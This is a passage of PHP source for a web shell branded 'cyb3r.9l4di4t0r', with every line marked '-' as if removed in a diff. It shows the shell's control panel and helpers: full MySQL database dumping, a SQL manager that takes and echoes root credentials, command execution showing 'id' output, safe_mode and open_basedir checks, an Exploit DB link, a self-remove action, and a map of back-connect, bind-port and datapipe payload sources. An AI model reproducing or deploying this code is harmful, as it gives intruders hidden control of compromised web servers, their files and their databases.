- $g["r"] = ($mode & 00040) > 0; $g["w"] = ($mode & 00020) > 0; $g["x"] = ($mode & 00010) > 0;

-

- $w["r"] = ($mode & 00004) > 0; $w["w"] = ($mode & 00002) > 0; $w["x"] = ($mode & 00001) > 0;

-

- return array("t"=>$t,"o"=>$o,"g"=>$g,"w"=>$w);

-

-}

-

-}

-

-if (!function_exists("parsesort"))

-

-{

-

-function parsesort($sort)

-

-{

-

- $one = intval($sort);

-

- $second = substr($sort,-1);

-

- if ($second != "d") {$second = "a";}

-

- return array($one,$second);

-

-}

-

-}

-

-if (!function_exists("view_perms_color"))

-

-{

-

-function view_perms_color($o)

-

-{

-

- if (!is_readable($o)) {return "<font color=red>".view_perms(fileperms($o))."</font>";}

-

- elseif (!is_writable($o)) {return "<font color=white>".view_perms(fileperms($o))."</font>";}

-

- else {return "<font color=green>".view_perms(fileperms($o))."</font>";}

-

-}

-

-}

-

-if (!function_exists("cyb3rgetsource"))

-

-{

-

-function cyb3rgetsource($fn)

-

-{

-

- global $cyb3r_sourcesurl;

-

- $array = array(

-

-  "cyb3r_bindport.pl" => "cyb3r_bindport_pl.txt",

-

-  "cyb3r_bindport.c" => "cyb3r_bindport_c.txt",

-

-  "cyb3r_backconn.pl" => "cyb3r_backconn_pl.txt",

-

-  "cyb3r_backconn.c" => "cyb3r_backconn_c.txt",

-

-  "cyb3r_datapipe.pl" => "cyb3r_datapipe_pl.txt",

-

-  "cyb3r_datapipe.c" => "cyb3r_datapipe_c.txt",

-

- );

-

-}

-

-}

-

-if (!function_exists("mysql_dump"))

-

-{

-

-function mysql_dump($set)

-

-{

-

- global $shver;

-

- $sock = $set["sock"];

-

- $db = $set["db"];

-

- $print = $set["print"];

-

- $nl2br = $set["nl2br"];

-

- $file = $set["file"];

-

- $add_drop = $set["add_drop"];

-

- $tabs = $set["tabs"];

-

- $onlytabs = $set["onlytabs"];

-

- $ret = array();

-

- $ret["err"] = array();

-

- if (!is_resource($sock)) {echo("Error: \$sock is not valid resource.");}

-

- if (empty($db)) {$db = "db";}

-

- if (empty($print)) {$print = 0;}

-

- if (empty($nl2br)) {$nl2br = 0;}

-

- if (empty($add_drop)) {$add_drop = TRUE;}

-

- if (empty($file))

-

- {

-

-  $file = $tmpdir."dump_".getenv("SERVER_NAME")."_".$db."_".date("d-m-Y-H-i-s").".sql";

-

- }

-

- if (!is_array($tabs)) {$tabs = array();}

-

- if (empty($add_drop)) {$add_drop = TRUE;}

-

- if (sizeof($tabs) == 0)

-

- {

-

-  // retrive tables-list

-

-  $res = mysql_query("SHOW TABLES FROM ".$db, $sock);

-

-  if (mysql_num_rows($res) > 0) {while ($row = mysql_fetch_row($res)) {$tabs[] = $row[0];}}

-

- }

-

- $out = "# Dumped by cyb3rell.SQL v. ".$shver."

-

-# Home page: http://ccteam.ru

-

-#

-

-# Host settings:

-

-# MySQL version: (".mysql_get_server_info().") running on ".getenv("SERVER_ADDR")." (".getenv("SERVER_NAME").")"."

-

-# Date: ".date("d.m.Y H:i:s")."

-

-# DB: \"".$db."\"

-

-#---------------------------------------------------------

-

-";

-

- $c = count($onlytabs);

-

- foreach($tabs as $tab)

-

- {

-

-  if ((in_array($tab,$onlytabs)) or (!$c))

-

-  {

-

-   if ($add_drop) {$out .= "DROP TABLE IF EXISTS `".$tab."`;\n";}

-

-   // recieve query for create table structure

-

-   $res = mysql_query("SHOW CREATE TABLE `".$tab."`", $sock);

-

-   if (!$res) {$ret["err"][] = mysql_smarterror();}

-

-   else

-

-   {

-

-    $row = mysql_fetch_row($res);

-

-    $out .= $row["1"].";\n\n";

-

-    // recieve table variables

-

-    $res = mysql_query("SELECT * FROM `$tab`", $sock);

-

-    if (mysql_num_rows($res) > 0)

-

-    {

-

-     while ($row = mysql_fetch_assoc($res))

-

-     {

-

-      $keys = implode("`, `", array_keys($row));

-

-      $values = array_values($row);

-

-      foreach($values as $k=>$v) {$values[$k] = addslashes($v);}

-

-      $values = implode("', '", $values);

-

-      $sql = "INSERT INTO `$tab`(`".$keys."`) VALUES ('".$values."');\n";

-

-      $out .= $sql;

-

-     }

-

-    }

-

-   }

-

-  }

-

- }

-

- $out .= "#---------------------------------------------------------------------------------\n\n";

-

- if ($file)

-

- {

-

-  $fp = fopen($file, "w");

-

-  if (!$fp) {$ret["err"][] = 2;}

-

-  else

-

-  {

-

-   fwrite ($fp, $out);

-

-   fclose ($fp);

-

-  }

-

- }

-

- if ($print) {if ($nl2br) {echo nl2br($out);} else {echo $out;}}

-

- return $out;

-

-}

-

-}

-

-if (!function_exists("mysql_buildwhere"))

-

-{

-

-function mysql_buildwhere($array,$sep=" and",$functs=array())

-

-{

-

- if (!is_array($array)) {$array = array();}

-

- $result = "";

-

- foreach($array as $k=>$v)

-

- {

-

-  $value = "";

-

-  if (!empty($functs[$k])) {$value .= $functs[$k]."(";}

-

-  $value .= "'".addslashes($v)."'";

-

-  if (!empty($functs[$k])) {$value .= ")";}

-

-  $result .= "`".$k."` = ".$value.$sep;

-

- }

-

- $result = substr($result,0,strlen($result)-strlen($sep));

-

- return $result;

-

-}

-

-}

-

-if (!function_exists("mysql_fetch_all"))

-

-{

-

-function mysql_fetch_all($query,$sock)

-

-{

-

- if ($sock) {$result = mysql_query($query,$sock);}

-

- else {$result = mysql_query($query);}

-

- $array = array();

-

- while ($row = mysql_fetch_array($result)) {$array[] = $row;}

-

- mysql_free_result($result);

-

- return $array;

-

-}

-

-}

-

-if (!function_exists("mysql_smarterror"))

-

-{

-

-function mysql_smarterror($type,$sock)

-

-{

-

- if ($sock) {$error = mysql_error($sock);}

-

- else {$error = mysql_error();}

-

- $error = htmlspecialchars($error);

-

- return $error;

-

-}

-

-}

-

-if (!function_exists("mysql_query_form"))

-

-{

-

-function mysql_query_form()

-

-{

-

- global $submit,$sql_act,$sql_query,$sql_query_result,$sql_confirm,$sql_query_error,$tbl_struct;

-

- if (($submit) and (!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "<b>Error:</b> <br>".$sql_query_error."<br>";}

-

- if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;}

-

- if ((!$submit) or ($sql_act))

-

- {

-

-  echo "<table border=0><tr><td><form name=\"cyb3r_sqlquery\" method=POST><b>"; if (($sql_query) and (!$submit)) {echo "Do you really want to";} else {echo "SQL-Query";} echo ":</b><br><br><textarea name=sql_query cols=100 rows=10>".htmlspecialchars($sql_query)."</textarea><br><br><input type=hidden name=act value=sql><input type=hidden name=sql_act value=query><input type=hidden name=sql_tbl value=\"".htmlspecialchars($sql_tbl)."\"><input type=hidden name=submit value=\"1\"><input type=hidden name=\"sql_goto\" value=\"".htmlspecialchars($sql_goto)."\"><input type=submit name=sql_confirm value=\"Yes\">&nbsp;<input type=submit value=\"No\"></form></td>";

-

-  if ($tbl_struct)

-

-  {

-

-   echo "<td valign=\"top\"><b>Fields:</b><br>";

-

-   foreach ($tbl_struct as $field) {$name = $field["Field"]; echo "» <a href=\"#\" onclick=\"document.cyb3r_sqlquery.sql_query.value+='`".$name."`';\"><b>".$name."</b></a><br>";}

-

-   echo "</td></tr></table>";

-

-  }

-

- }

-

- if ($sql_query_result or (!$sql_confirm)) {$sql_query = $sql_last_query;}

-

-}

-

-}

-

-if (!function_exists("mysql_create_db"))

-

-{

-

-function mysql_create_db($db,$sock="")

-

-{

-

- $sql = "CREATE DATABASE `".addslashes($db)."`;";

-

- if ($sock) {return mysql_query($sql,$sock);}

-

- else {return mysql_query($sql);}

-

-}

-

-}

-

-if (!function_exists("mysql_query_parse"))

-

-{

-

-function mysql_query_parse($query)

-

-{

-

- $query = trim($query);

-

- $arr = explode (" ",$query);

-

- /*array array()

-

- {

-

-  "METHOD"=>array(output_type),

-

-  "METHOD1"...

-

-  ...

-

- }

-

- if output_type == 0, no output,

-

- if output_type == 1, no output if no error

-

- if output_type == 2, output without control-buttons

-

- if output_type == 3, output with control-buttons

-

- */

-

- $types = array(

-

-  "SELECT"=>array(3,1),

-

-  "SHOW"=>array(2,1),

-

-  "DELETE"=>array(1),

-

-  "DROP"=>array(1)

-

- );

-

- $result = array();

-

- $op = strtoupper($arr[0]);

-

- if (is_array($types[$op]))

-

- {

-

-  $result["propertions"] = $types[$op];

-

-  $result["query"]  = $query;

-

-  if ($types[$op] == 2)

-

-  {

-

-   foreach($arr as $k=>$v)

-

-   {

-

-    if (strtoupper($v) == "LIMIT")

-

-    {

-

-     $result["limit"] = $arr[$k+1];

-

-     $result["limit"] = explode(",",$result["limit"]);

-

-     if (count($result["limit"]) == 1) {$result["limit"] = array(0,$result["limit"][0]);}

-

-     unset($arr[$k],$arr[$k+1]);

-

-    }

-

-   }

-

-  }

-

- }

-

- else {return FALSE;}

-

-}

-

-}

-

-if (!function_exists("cyb3rfsearch"))

-

-{

-

-function cyb3rfsearch($d)

-

-{

-

- global $found;

-

- global $found_d;

-

- global $found_f;

-

- global $search_i_f;

-

- global $search_i_d;

-

- global $a;

-

- if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}

-

- $h = opendir($d);

-

- while (($f = readdir($h)) !== FALSE)

-

- {

-

-  if($f != "." && $f != "..")

-

-  {

-

-   $bool = (empty($a["name_regexp"]) and strpos($f,$a["name"]) !== FALSE) || ($a["name_regexp"] and ereg($a["name"],$f));

-

-   if (is_dir($d.$f))

-

-   {

-

-    $search_i_d++;

-

-    if (empty($a["text"]) and $bool) {$found[] = $d.$f; $found_d++;}

-

-    if (!is_link($d.$f)) {cyb3rfsearch($d.$f);}

-

-   }

-

-   else

-

-   {

-

-    $search_i_f++;

-

-    if ($bool)

-

-    {

-

-     if (!empty($a["text"]))

-

-     {

-

-      $r = @file_get_contents($d.$f);

-

-      if ($a["text_wwo"]) {$a["text"] = " ".trim($a["text"])." ";}

-

-      if (!$a["text_cs"]) {$a["text"] = strtolower($a["text"]); $r = strtolower($r);}

-

-      if ($a["text_regexp"]) {$bool = ereg($a["text"],$r);}

-

-      else {$bool = strpos(" ".$r,$a["text"],1);}

-

-      if ($a["text_not"]) {$bool = !$bool;}

-

-      if ($bool) {$found[] = $d.$f; $found_f++;}

-

-     }

-

-     else {$found[] = $d.$f; $found_f++;}

-

-    }

-

-   }

-

-  }

-

- }

-

- closedir($h);

-

-}

-

-}

-

-if ($act == "gofile") {if (is_dir($f)) {$act = "ls"; $d = $f;} else {$act = "f"; $d = dirname($f); $f = basename($f);}}

-

-//Sending headers

-

-@ob_start();

-

-@ob_implicit_flush(0);

-

-function onphpshutdown()

-

-{

-

- global $gzipencode,$ft;

-

- if (!headers_sent() and $gzipencode and !in_array($ft,array("img","download","notepad")))

-

- {

-

-  $v = @ob_get_contents();

-

-  @ob_end_clean();

-

-  @ob_start("ob_gzHandler");

-

-  echo $v;

-

-  @ob_end_flush();

-

- }

-

-}

-

-function cyb3rexit()

-

-{

-

- onphpshutdown();

-

- exit;

-

-}

-

-

-if (empty($tmpdir))

-

-{

-

- $tmpdir = ini_get("upload_tmp_dir");

-

- if (is_dir($tmpdir)) {$tmpdir = "/tmp/";}

-

-}

-

-$tmpdir = realpath($tmpdir);

-

-$tmpdir = str_replace("\\",DIRECTORY_SEPARATOR,$tmpdir);

-

-if (substr($tmpdir,-1) != DIRECTORY_SEPARATOR) {$tmpdir .= DIRECTORY_SEPARATOR;}

-

-if (empty($tmpdir_logs)) {$tmpdir_logs = $tmpdir;}

-

-else {$tmpdir_logs = realpath($tmpdir_logs);}

-

-if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on")

-

-{

-

- $safemode = TRUE;

-

- $hsafemode = "<font color=green>ON (secure)</font>";

-  $sfmode = "<font color=green><b>ON (secure)</b></font>";

-}

-

-else {$safemode = FALSE; $hsafemode = "<font color=red>OFF (not secure)</font>"; $sfmode = "<font color=red><b>OFF (not secure)</b></font>";}

-

-$v = @ini_get("open_basedir");

-

-if ($v or strtolower($v) == "on") {$openbasedir = TRUE; $hopenbasedir = "<font color=red>".$v."</font>";}

-

-else {$openbasedir = FALSE; $hopenbasedir = "<font color=green>OFF (not secure)</font>";}

-

-$sort = htmlspecialchars($sort);

-

-if (empty($sort)) {$sort = $sort_default;}

-

-$sort[1] = strtolower($sort[1]);

-

-$DISP_SERVER_SOFTWARE = getenv("SERVER_SOFTWARE");

-

-if (!ereg("PHP/".phpversion(),$DISP_SERVER_SOFTWARE)) {$DISP_SERVER_SOFTWARE .= ". PHP/".phpversion();}

-

-$DISP_SERVER_SOFTWARE = str_replace("PHP/".phpversion(),'[<a href="http://www.google.com/search?q='.$kernel.' '. $release.'" target=_blank ><b><u><font color="red">Google</font></u></b></a>]',htmlspecialchars($DISP_SERVER_SOFTWARE));

-

-@ini_set("highlight.bg",$highlight_bg); //FFFFFF

-

-@ini_set("highlight.comment",$highlight_comment); //#FF8000

-

-@ini_set("highlight.default",$highlight_default); //#0000BB

-

-@ini_set("highlight.html",$highlight_html); //#000000

-

-@ini_set("highlight.keyword",$highlight_keyword); //#007700

-

-@ini_set("highlight.string",$highlight_string); //#DD0000

-

-if (!is_array($actbox)) {$actbox = array();}

-

-$dspact = $act = htmlspecialchars($act);

-

-$disp_fullpath = $ls_arr = $notls = null;

-

-$ud = urlencode($d);

-

-?>

-

-<center>

-<TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#15354c borderColorLight=#c0c0c0 border=1 bordercolor="#C0C0C0">

-<tr>

-<td><center><p><a href="?"><img src="http://s15.postimage.org/5oskuq363/image.png" height="68px" width="66px" border="0px"/></a><br />cyb3r.9l4di4t0r<br /><?php echo $shver; ?> </p></center></td>

-<td width="90%">

-<TABLE style="BORDER-COLLAPSE: collapse" borderColorDark=#c0c0c0 cellPadding=3 width="100%" bgColor=#15354c borderColorLight=#c0c0c0 border=0>

- <tr>

-    <td width="9%" ><b>Software :</b></td>

-    <td ><b><?php echo $DISP_SERVER_SOFTWARE.' [<a href="'.$expltlink.'" target=_blank><b><u><font color="yellow">Exploit DB</font></u></b></a>]'; ?></b></td>

-    <td width="9%"><?php echo "<a href=\"".$surl."act=serverinfo\" ><b><u>Server</u> I.P.</b></a>"?></td>

-    <td width="9%"><b><?php echo getenv('SERVER_ADDR'); ?></b></td>

- </tr>

- <tr>

-    <td width="9%" ><?php echo "<a href=\"".$surl."act=security\" ><b><u>Uname-a</u> :</b></a>"?></td>

-    <td ><b><?php echo wordwrap(php_uname(),90,"<br>",1); ?></b></td>

-    <td width="9%"><?php echo "<a href=\"".$surl."act=clientinfo\" ><b><u>Client</u> I.P.</b></a>"?></td>

-    <td width="9%"><b><?php echo $_SERVER['REMOTE_ADDR']; ?></b></td>

- </tr>

- <tr>

-    <td width="9%" ><?php echo "<a href=\"".$surl."act=processes\" ><b><u>Username</u> :</b></a>"?></td>

-    <td ><b><?php if (!$win) {echo wordwrap(myshellexec("id"),90,"<br>",1);} else {echo get_current_user();} ?></b></td>

-    <td width="9%"><?php echo "<a href=\"".$surl."act=systeminfo\" ><b><u>Sys</u>tem<u>info</u></b></a>"?></td>

-    <td width="9%"></td>

- </tr>

- <tr>

-    <td width="9%" ><b>Safe Mode :</b></td>

-    <td ><b><?php echo $hsafemode; ?></b></td>

-    <td width="9%"><b></b></td>

-    <td width="9%"></td>

- </tr>

- <tr>

-    <td width="9%" ><b>Directory :</b></td>

-    <td ><b>

-        <?php

-

-$d = str_replace("\\",DIRECTORY_SEPARATOR,$d);

-

-if (empty($d)) {$d = realpath(".");} elseif(realpath($d)) {$d = realpath($d);}

-

-$d = str_replace("\\",DIRECTORY_SEPARATOR,$d);

-

-if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}

-

-$d = str_replace("\\\\","\\",$d);

-

-$dispd = htmlspecialchars($d);

-

-$pd = $e = explode(DIRECTORY_SEPARATOR,substr($d,0,-1));

-

-$i = 0;

-

-foreach($pd as $b)

-

-{

-

- $t = "";

-

- $j = 0;

-

- foreach ($e as $r)

-

- {

-

-  $t.= $r.DIRECTORY_SEPARATOR;

-

-  if ($j == $i) {break;}

-

-  $j++;

-

- }

-

- echo "<a href=\"".$surl."act=ls&d=".urlencode($t)."&sort=".$sort."\"><b>".htmlspecialchars($b).DIRECTORY_SEPARATOR."</b></a>";

-

- $i++;

-

-}

-

-echo "&nbsp;&nbsp;&nbsp;";

-

-if (is_writable($d))

-

-{

-

- $wd = TRUE;

-

- $wdt = "<font color=green>[ ok ]</font>";

-

- echo "<b><font color=green>".view_perms(fileperms($d))."</font></b>";

-

-}

-

-else

-

-{

-

- $wd = FALSE;

-

- $wdt = "<font color=red>[ Read-Only ]</font>";

-

- echo "<b>".view_perms_color($d)."</b>";

-

-}

- ?>

- </b></td>

-    <td width="9%"><?php echo "<a href=\"".$surl."act=selfremove\" ><b><font color='orange'>Self <u>Remove</u></font></b></a>"?></td>

-    <td width="9%"></td>

- </tr>

- <tr>

-    <td width="9%" ><b>Free Space :</b></td>

-    <td ><b>

-        <?php if (is_callable("disk_free_space"))

-

-{

-

- $free = disk_free_space($d);

-

- $total = disk_total_space($d);

-

- if ($free === FALSE) {$free = 0;}

-

- if ($total === FALSE) {$total = 0;}

-

- if ($free < 0) {$free = 0;}

-

- if ($total < 0) {$total = 0;}

-

- $used = $total-$free;

-

- $free_percent = round(100/($total/$free),2);

-

- echo "<b>".view_size($free)." of ".view_size($total)." (".$free_percent."%)</b>";

-

-}?>

-    </b></td>

-    <td width="9%"><?php echo "<a href=\"".$surl."act=feedback\" ><b>Feed<u>back</u></b></a>"?></td>

-    <td width="9%"></td>

- </tr>

- <tr>

-    <td width="9%" ><b>Drives :</b></td>

-    <td ><b>

-        <?php $letters = "";

-

-if ($win)

-

-{

-

- $v = explode("\\",$d);

-

- $v = $v[0];

-

- foreach (range("a","z") as $letter)

-

- {

-

-  $bool = $isdiskette = in_array($letter,$safemode_diskettes);

-

-  if (!$bool) {$bool = is_dir($letter.":\\");}

-

-  if ($bool)

-

-  {

-

-   $letters .= "<a href=\"".$surl."act=ls&d=".urlencode($letter.":\\")."\"".($isdiskette?" onclick=\"return confirm('Make sure that the diskette is inserted properly, otherwise an error may occur.')\"":"").">[ ";

-

-   if ($letter.":" != $v) {$letters .= $letter;}

-

-   else {$letters .= "<font color=green>".$letter."</font>";}

-

-   $letters .= " ]</a> ";

-

-  }

-

- }

-

- if (!empty($letters)) {echo $letters."<br>";}

-}

- ?></b></td>

-    <td width="9%"><a href="<?php echo $self.'?logout'?>"><b><font color='green'>I'm <u>Out</u> !</font></b></a></td>

-    <td width="9%"></td>

- </tr>

-

- </table>

-</td>

-

-</tr>

-</table>

-

-<TABLE style="BORDER-COLLAPSE: collapse" height="1" cellSpacing=0 borderColorDark=#c0c0c0 cellPadding=5 width="100%" bgColor=#15354c borderColorLight=#c0c0c0 border=1>

-<tr><td width="100%" valign="top">

-            ADMIN: <?php echo $_SERVER['SERVER_ADMIN'];?> <font color="silver">|</font>

-            PHP : <?php echo "<a href=\"".$surl."act=phpinfo\" target=\"_blank\"><b><u>".$phpVersion."</u></b></a>"?> <font color="silver">|</font>

-            Curl : <?php echo function_exists('curl_version')?("<font color='red'>Enabled</font>"):("Disabled"); ?>  <font color="silver">|</font>

-            Oracle : <?php echo function_exists('ocilogon')?("<font color='red'>Enabled</font>"):("Disabled"); ?> <font color="silver">|</font>

-            MySQL : <?php  echo function_exists('mysql_connect')?("<font color='red'>Enabled</font>"):("Disabled");?> <font color="silver">|</font>

-            MSSQL : <?php echo function_exists('mssql_connect')?("<font color='red'>Enabled</font>"):("Disabled"); ?> <font color="silver">|</font>

-            PostgreSQL : <?php echo function_exists('pg_connect')?("<font color='red'>Enabled</font>"):("Disabled"); ?> <font color="silver">|</font>

-            Disable functions : <?php getDisabledFunctions(); ?>        

-            </td></tr>

-</table>

-

-<TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#c0c0c0 cellPadding=5 width="100%" bgColor=#15354c borderColorLight=#c0c0c0 border=1 bordercolor="#C0C0C0">

-<tr><td width="100%" valign="top">

-   <?php

-    if (count($quicklaunch) > 0)

-

-    {

-

-     foreach($quicklaunch as $item)

-

-     {

-

-      $item[1] = str_replace("%d",urlencode($d),$item[1]);

-

-      $item[1] = str_replace("%sort",$sort,$item[1]);

-

-      $v = realpath($d."..");

-

-      if (empty($v)) {$a = explode(DIRECTORY_SEPARATOR,$d); unset($a[count($a)-2]); $v = join(DIRECTORY_SEPARATOR,$a);}

-

-      $item[1] = str_replace("%upd",urlencode($v),$item[1]);

-

-      echo "<a href=\"".$item[1]."\">".$item[0]."</a>&nbsp;&nbsp;&nbsp;&nbsp;";

-

-     }

-

-    }?>

-   </td>

-  </tr>

- </table><br>

-<?php

-

-if ((!empty($donated_html)) and (in_array($act,$donated_act))) {echo "<TABLE style=\"BORDER-COLLAPSE: collapse\" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=#15354c borderColorLight=#c0c0c0 border=1><tr><td width=\"100%\" valign=\"top\">".$donated_html."</td></tr></table><br>";}

-

-echo "<TABLE style=\"BORDER-COLLAPSE: collapse\" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=#15354c borderColorLight=#c0c0c0 border=1><tr><td width=\"100%\" valign=\"top\">";

-

-if ($act == "") {$act = $dspact = "ls";}

-

-if ($act == "sql")

-

-{

-

- $sql_surl = $surl."act=sql";

-

- if ($sql_login)  {$sql_surl .= "&sql_login=".htmlspecialchars($sql_login);}

-

- if ($sql_passwd) {$sql_surl .= "&sql_passwd=".htmlspecialchars($sql_passwd);}

-

- if ($sql_server) {$sql_surl .= "&sql_server=".htmlspecialchars($sql_server);}

-

- if ($sql_port)   {$sql_surl .= "&sql_port=".htmlspecialchars($sql_port);}

-

- if ($sql_db)     {$sql_surl .= "&sql_db=".htmlspecialchars($sql_db);}

-

- $sql_surl .= "&";

-

- ?><h3>Attention! SQL-Manager is <u>NOT</u> ready module! Don't reports bugs.</h3>

- <TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#15354c borderColorLight=#c0c0c0 border=1 bordercolor="#C0C0C0"><tr><td width="100%" height="1" colspan="2" valign="top"><center><?php

-

- if ($sql_server)

-

- {

-

-  $sql_sock = mysql_connect($sql_server.":".$sql_port, $sql_login, $sql_passwd);

-

-  $err = mysql_smarterror();

-

-  @mysql_select_db($sql_db,$sql_sock);

-

-  if ($sql_query and $submit) {$sql_query_result = mysql_query($sql_query,$sql_sock); $sql_query_error = mysql_smarterror();}

-

- }

-

- else {$sql_sock = FALSE;}

-

- echo "<b>SQL Manager:</b><br>";

-

- if (!$sql_sock)

-

- {

-

-  if (!$sql_server) {echo "NO CONNECTION";}

-

-  else {echo "<center><b>Can't connect</b></center>"; echo "<b>".$err."</b>";}

-

- }

-

- else

-

- {

-

-  $sqlquicklaunch = array();

-

-  $sqlquicklaunch[] = array("Index",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&");

-

-  $sqlquicklaunch[] = array("Query",$sql_surl."sql_act=query&sql_tbl=".urlencode($sql_tbl));

-

-  $sqlquicklaunch[] = array("Server-status",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=serverstatus");

-

-  $sqlquicklaunch[] = array("Server variables",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=servervars");

-

-  $sqlquicklaunch[] = array("Processes",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=processes");

-

-  $sqlquicklaunch[] = array("Logout",$surl."act=sql");

-

-  echo "<center><b>MySQL ".mysql_get_server_info()." (proto v.".mysql_get_proto_info ().") running in ".htmlspecialchars($sql_server).":".htmlspecialchars($sql_port)." as ".htmlspecialchars($sql_login)."@".htmlspecialchars($sql_server)." (password - \"".htmlspecialchars($sql_passwd)."\")</b><br>";

-

-  if (count($sqlquicklaunch) > 0) {foreach($sqlquicklaunch as $item) {echo "[ <a href=\"".$item[1]."\"><b>".$item[0]."</b></a> ] ";}}

-

-  echo "</center>";

-

- }

-

- echo "</td></tr><tr>";

-

- if (!$sql_sock) {?>

- <td width="28%" height="100" valign="top"><center><font size="5"> i </font></center>

-  <li>If login is null, login is owner of process.<li>

-  If host is null, host is localhost</b><li>If port is null, port is 3306 (default)</td><td width="90%" height="1" valign="top"><TABLE height=1 cellSpacing=0 cellPadding=0 width="100%" border=0><tr><td>&nbsp;<b>Please, fill the form:</b><table><tr><td><b>Username</b></td><td><b>Password</b>&nbsp;</td><td><b>Database</b>&nbsp;</td></tr><form action="<?php echo $surl; ?>" method="POST"><input type="hidden" name="act" value="sql"><tr><td><input type="text" name="sql_login" value="root" maxlength="64"></td><td><input type="password" name="sql_passwd" value="" maxlength="64"></td><td><input type="text" name="sql_db" value="" maxlength="64"></td></tr><tr><td><b>Host</b></td><td><b>PORT</b></td></tr><tr><td align=right><input type="text" name="sql_server" value="localhost" maxlength="64"></td><td><input type="text" name="sql_port" value="3306" maxlength="6" size="3"></td><td><input type="submit" value="Connect"></td></tr><tr><td></td></tr></form></table>

-  </td>

-  <?php }

-

- else

-{

-

-  //Start left panel

-

-  if (!empty($sql_db))

-  {

-

-   ?><td width="25%" height="100%" valign="top"><a href="<?php echo $surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&"; ?>"><b>Home</b></a><hr size="1" noshade><?php

-

-   $result = mysql_list_tables($sql_db);

-

-   if (!$result) {echo mysql_smarterror();}

-

-   else

-

-   {

-

-    echo "---[ <a href=\"".$sql_surl."&\"><b>".htmlspecialchars($sql_db)."</b></a> ]---<br>";

-

-    $c = 0;

-

-    while ($row = mysql_fetch_array($result)) {$count = mysql_query ("SELECT COUNT(*) FROM ".$row[0]); $count_row = mysql_fetch_array($count); echo "<b>»&nbsp;<a href=\"".$sql_surl."sql_db=".htmlspecialchars($sql_db)."&sql_tbl=".htmlspecialchars($row[0])."\"><b>".htmlspecialchars($row[0])."</b></a> (".$count_row[0].")</br></b>"; mysql_free_result($count); $c++;}

-

-    if (!$c) {echo "No tables found in database.";}

-

-   }

-

-  }

-

-  else

-

-  {

-

-   ?><td width="1" height="100" valign="top"><a href="<?php echo $sql_surl; ?>"><b>Home</b></a><hr size="1" noshade><?php

-

-   $result = mysql_list_dbs($sql_sock);

-

-   if (!$result) {echo mysql_smarterror();}

-

-   else

-

-   {

-

-    ?><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><select name="sql_db"><?php

-

-    $c = 0;

-

-    $dbs = "";

-

-    while ($row = mysql_fetch_row($result)) {$dbs .= "<option value=\"".$row[0]."\""; if ($sql_db == $row[0]) {$dbs .= " selected";} $dbs .= ">".$row[0]."</option>"; $c++;}

-

-    echo "<option value=\"\">Databases (".$c.")</option>";

-

-    echo $dbs;

-

-   }

-

-   ?></select><hr size="1" noshade>Please, select database<hr size="1" noshade><input type="submit" value="Go"></form><?php

-

-  }

-

-  //End left panel

-

-  echo "</td><td width=\"100%\" height=\"1\" valign=\"top\">";

-

-  //Start center panel

-

-  $diplay = TRUE;

-

-  if ($sql_db)

-

-  {

-

-   if (!is_numeric($c)) {$c = 0;}

-

-   if ($c == 0) {$c = "no";}

-

-   echo "<hr size=\"1\" noshade><center><b>There are ".$c." table(s) in this DB (".htmlspecialchars($sql_db).").<br>";

-

-   if (count($dbquicklaunch) > 0) {foreach($dbsqlquicklaunch as $item) {echo "[ <a href=\"".$item[1]."\">".$item[0]."</a> ] ";}}

-

-   echo "</b></center>";

-

-   $acts = array("","dump");

-

-   if ($sql_act == "tbldrop") {$sql_query = "DROP TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}

-

-   elseif ($sql_act == "tblempty") {$sql_query = ""; foreach($boxtbl as $v) {$sql_query .= "DELETE FROM `".$v."` \n";} $sql_act = "query";}

-

-   elseif ($sql_act == "tbldump") {if (count($boxtbl) > 0) {$dmptbls = $boxtbl;} elseif($thistbl) {$dmptbls = array($sql_tbl);} $sql_act = "dump";}

-

-   elseif ($sql_act == "tblcheck") {$sql_query = "CHECK TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}

-

-   elseif ($sql_act == "tbloptimize") {$sql_query = "OPTIMIZE TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}

-

